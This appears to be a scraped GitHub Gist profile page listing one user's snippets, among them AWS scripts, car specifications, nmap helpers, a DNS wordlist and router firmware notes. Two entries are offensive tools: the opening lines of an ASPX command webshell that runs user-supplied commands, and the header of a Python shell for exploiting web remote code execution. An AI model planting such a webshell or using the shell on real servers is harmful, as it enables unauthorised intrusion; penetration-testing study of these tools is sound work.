Skip to content

Instantly share code, notes, and snippets.

View Malayke's full-sized avatar

Malayke

  • planet Earth (Solar System)
View GitHub Profile
@Malayke
Malayke / grant_permission.sh
Created August 15, 2025 04:17
aws secrets manager auto rotate lambda function
#!/bin/bash
# put policy.json to location secretsManager/policy.json
# Create inline policy directly on the role
aws iam put-role-policy \
--role-name $ROLE_NAME \
--policy-name SecretsManagerAccess \
--policy-document file://secretsManager/policy.json
# Extract values from your JSON file
@Malayke
Malayke / info.txt
Last active June 9, 2024 11:13
subaru brz zd8
发动机型号: 2.4升DOHC非涡轮增压发动机
总长:4,265毫米(167.9英寸)ET 除外,4,280毫米(168.5英寸)适用于 ET
总宽:1,775毫米(69.9英寸)
整体高度(在C.W.):1,310毫米(51.6英寸)
轴距:2,575毫米(101.4英寸)
前轮距:1,520毫米(59.8英寸)
后轮距:1,550毫米(61.0英寸)
最小路面间隙:130毫米(5.1英寸)
发动机气缸排列:横置、水冷、四缸四冲程汽油发动机
发动机气门系统机构:链条驱动、双顶置凸轮轴、4气门/缸
@Malayke
Malayke / technologies.json
Created August 8, 2022 09:38
wappalyzer technologies
This file has been truncated, but you can view the full file.
{
"technologies": {
"1C-Bitrix": {
"cats": [
"1",
"6"
],
"category_names": null,
"cookies": {
"BITRIX_SM_GUEST_ID": "",
@Malayke
Malayke / http_put_server.py
Created June 9, 2022 07:55
python http put server
#!/usr/bin/env python3
import sys
import signal
from threading import Thread
from http.server import HTTPServer, BaseHTTPRequestHandler
@Malayke
Malayke / parse_nmap_gnmap_to_httpx.py
Last active January 28, 2025 23:26
parse/convert nmap grep output(gnmap) to projectdiscovery httpx target
#!/usr/bin/env python3
import sys
if not sys.stdin.isatty():
stdin = sys.stdin.read().splitlines()
gnmap = stdin
elif len(sys.argv) > 1:
target = sys.argv[1]
with open(GNMAP) as f:
@Malayke
Malayke / all.txt
Created April 11, 2022 15:22 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@Malayke
Malayke / cmd.aspx
Created May 8, 2020 08:51
dark theme cmd aspx webshell
<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="system.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<script runat="server">
Sub RunCmd(Src As Object, E As EventArgs)
Dim myProcess As New Process()
Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)
myProcessStartInfo.UseShellExecute = false
@Malayke
Malayke / nmap_quick_scan.sh
Last active June 5, 2020 02:03
nmap quick scan script
#!/bin/bash
NOCOLOR='\033[0m'
RED='\033[0;31m'
GREEN='\033[0;32m'
ORANGE='\033[0;33m'
BLUE='\033[0;34m'
PURPLE='\033[0;35m'
CYAN='\033[0;36m'
LIGHTGRAY='\033[0;37m'
@Malayke
Malayke / named-pip-shell.py
Created January 18, 2019 09:29
Make Web Remote Code Execution Vulnerabilities Great Again!
#!/usr/bin/python3
from cmd import Cmd
import requests
import readline
import sys
from base64 import b64encode
from random import randrange
import threading
from time import sleep
@Malayke
Malayke / Export ZTE F460 firmware.md
Last active July 6, 2022 16:19
中兴 F460 电信光猫固件提取

破解完光猫不过隐,继续琢磨,查了些智能设备安全的教程,分析智能设备或嵌入式设备安全,第一步是要提取固件,所以接下来要提取固件了。

通过/proc虚拟文件系统读取MTD分区表:

/ # cat /proc/mtd
dev:    size   erasesize  name
mtd0: 08000000 00020000 "whole flash"
mtd1: 00200000 00020000 "u-boot"